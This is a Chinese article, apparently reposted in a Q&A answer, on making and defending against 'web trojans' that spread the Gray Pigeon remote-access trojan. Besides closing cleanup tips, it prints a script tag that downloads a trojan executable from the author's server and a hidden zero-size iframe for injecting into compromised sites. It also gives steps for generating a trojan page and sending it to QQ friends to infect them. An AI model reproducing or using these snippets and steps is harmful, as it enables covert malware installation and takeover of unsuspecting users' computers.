胡歌还爱杨幂么:网页木马是怎么一回事

“灰鸽子”网页木马从原理、制作到防范

1.网页木马的攻击原理- 2.为什么是灰鸽子- 3.网页木马的基本用法（1）- 4.网页木马的基本用法（2）- 5.网页木马的防范策略（1）- 6.网页木马的防范策略（2）-
编者按：事物都有两面性。本文介绍的网页木马制作技巧，意在加强大家的防范意识，而不是想“荼毒生灵”。希望能给大家带来一些帮助，营造一个安全的上网环境。

如果你访问××网站（国内某门户网站），你就会中灰鸽子木马。这是我一黑客朋友给我说的一句说。打开该网站的首页，经检查，我确实中了灰鸽子。怎么实现的呢？他说，他侵入了该网站的服务器并在网站主页上挂了网页木马；一些安全专家常说，不要打开陌生人发来的网址，为什么？因为该网址很有可能就是一些不怀好意者精心制作的网页木马。

以上只是网页木马的两种形式，实际上网页木马还可以挂在多媒体文件（RM、RMVB、WMV、WMA、Flash）、电子邮件、论坛等多种文件和场合上。很可怕吧，那么用户如何防范网页木马呢？下面我们就先从网页木马的攻击原理说起。

一、网页木马的攻击原理

首先明确，网页木马实际上是一个HTML网页，与其它网页不同的是该网页是黑客精心制作的，用户一旦访问了该网页就会中木马。为什么说是黑客精心制作的呢？因为嵌入在这个网页中的脚本恰如其分地利用了IE浏览器的漏洞，让IE在后台自动下载黑客放置在网络上的木马并运行（安装）这个木马，也就是说，这个网页能下载木马到本地并运行（安装）下载到本地电脑上的木马，整个过程都在后台运行，用户一旦打开这个网页，下载过程和运行（安装）过程就自动开始。

有朋友会说，打开一个网页，IE浏览器真的能自动下载程序和运行程序吗？如果IE真的能肆无忌惮地任意下载和运行程序，那天下还不大乱。实际上，为了安全，IE浏览器是禁止自动下载程序特别是运行程序的，但是，IE浏览器存在着一些已知和未知的漏洞，网页木马就是利用这些漏洞获得权限来下载程序和运行程序的。下面我举IE浏览器早期的一个漏洞来分别说明这两个问题。

⒈自动下载程序

<SCRIPT LANGUAGE="icyfoxlovelace" src="http://go163go.vicp.net/1.exe"></SCRIPT>

小提示：代码说明

a. 代码中“src”的属性为程序的网络地址，本例中“http://go163go.vicp.net/1.exe”为我放置在自己Web服务器上的灰鸽子服务端安装程序，这段代码能让网页下载该程序到浏览它的电脑上。

b. 也可以把木马程序上传到免费的主页空间上去，但免费空间出于安全的考虑，多数不允许上传exe文件，黑客可能变通一下把扩展名exe改为bat或com，这样他们就可以把这些程序上传到服务器上了。

把这段代码插入到网页源代码的</BODY>…</BODY>之间（如图1），然后用没打补丁的IE6打开，接下来，打开IE的临时目录<Temporary Internet Files>，你会发现，在该文件夹中有一个“1.exe”文件，这也就是说，该网页已自动下载了我放置在Web服务器上的灰鸽子木马。

二、网页木马的基本用法

理解了网页木马攻击的原理，我们可以制作自己的网页木马，但这需要你根据IE漏洞写出利用代码。实际上，在网上有很多高手已写出了一些漏洞的利用代码，有的还把它写成了可视化的程序。在搜索引擎输入“网页木马生成器”进行搜索，你会发现，在网上有很多利用IE的各种漏洞编写的网页木马生成器，它们大都为可视化的程序，只要你有一个木马（该木马必须把它放置到网络上），利用这些生成器你就可以立即生成一个网页，该网页就是网页木马，只要他人打开这个网页，该网页就可以自动完成下载木马并运行（安装）木马的过程。

在我的电脑上我已下载了一个网页木马生成器，下面我们来看怎么生成网页木马并让他人中木马。

第一步：启动该网页木马生成器，如图4所示，在文本框中输入木马的网络地址，最后单击“生成”。

图4 网页木马生成器

第二步：在网页木马生成器的安装文件夹会生成一个网页文件，该文件就是我们在上一步生成的网页木马。上传该文件到自己的Web服务器或免费主面空间。

现在好了，把上述网页在服务器上的地址（网址）通过QQ发给自己的好友，一旦他访问了该网页，该网页就会在他的电脑上自动下载并运行你放置在网络上的木马。

现在你该明白安全专家劝告的“不要打开陌生人发来的网络地址”这句话的真谛了吧！实际上，即使人人都不打开陌生人发来的网址，也仍然有一些人“飞蛾补灯，自寻死路”，因为若大的Internet，总会有一些人会有意或无意地访问这些网址，而且，有些网页木马，还挂在一些知名网站上（根据知名网站的访问量，你算算吧，每天有多少人中了木马！）。

小提示：你可能还没想到，看电影，在论坛查看或回复帖子也能中木马。实际上，网页木马还可以挂在多媒体文件、电子邮件、论坛、CHM电子书上，这样，用户一旦观看电影、查看或预览邮件（主要是一些用电子邮件群发器发送的垃圾邮件）、参与帖子，打开电子书，用户就会中网页木马。

在下面我们只介绍黑客如何在知名网站上挂网页木马。下面来看这一段代码：iframe src="http://go163go.vicp.net/hk.htm" width="0" height="0" frameborder="0"></iframe>

参考资料上很详细！！！！！
参考资料：http://www.pconline.com.cn/pcedu/soft/virus/hkgfz/0604/783762_2.html

网页木马就是利用你系统或软件的漏洞,在你浏览网页时下载一个木马程序,再利用该木马来控制你的电脑,盗取你的有用资料!

解决办法：1,修复IE，可以用黄山IE修复专家修复一下，去华军软件园后面网址下载就行。http://yncnc.onlinedown.net/soft/18437.htm 这个方法可以修复IE，或者瑞星卡卡上网安全助手 以防止以后被恶意修改 地址 http://tool.ikaka.com/ 还有Windows流氓软件清理大师
http://dl.pconline.com.cn/html/1/0/dlid=14270&dltypeid=1&pn=0&.html 一个完全免费的超强的系统维护工具，能够检测、清理已知的大多数广告软件、工具条和流氓软件。比起其它同类软件，清理软件更方便、更彻底，并且是国内唯一能真正彻底清理流氓软件所有的注册表及文件记录，不需要进入DOS，不需要进入安全模式，不需要备份注册表，只要清理后重新启动一次即可卸载干净。
2，查看启动项,另外为了你电脑启动快一下 ;还有就是查看一下是不是启动项目里面有病毒，你可以点击开始－运行－输入msconfig回车出现对话框 把上面最后一个启动项里面的除了输入法（ctfmon）以外其他没有用的启动项前面的勾去掉（全部去掉也可以），重新启动.2000系统没有这个命令你可以http://blog.playes.net/Down/msconfig.rar 到这里下载，解压后双击即可使用。
3，杀毒，升级杀毒软件，到安全模式彻底杀毒，进入安全模式的方法，开机的时候连续快速的按F8，出现菜单选择安全模式进入就可以。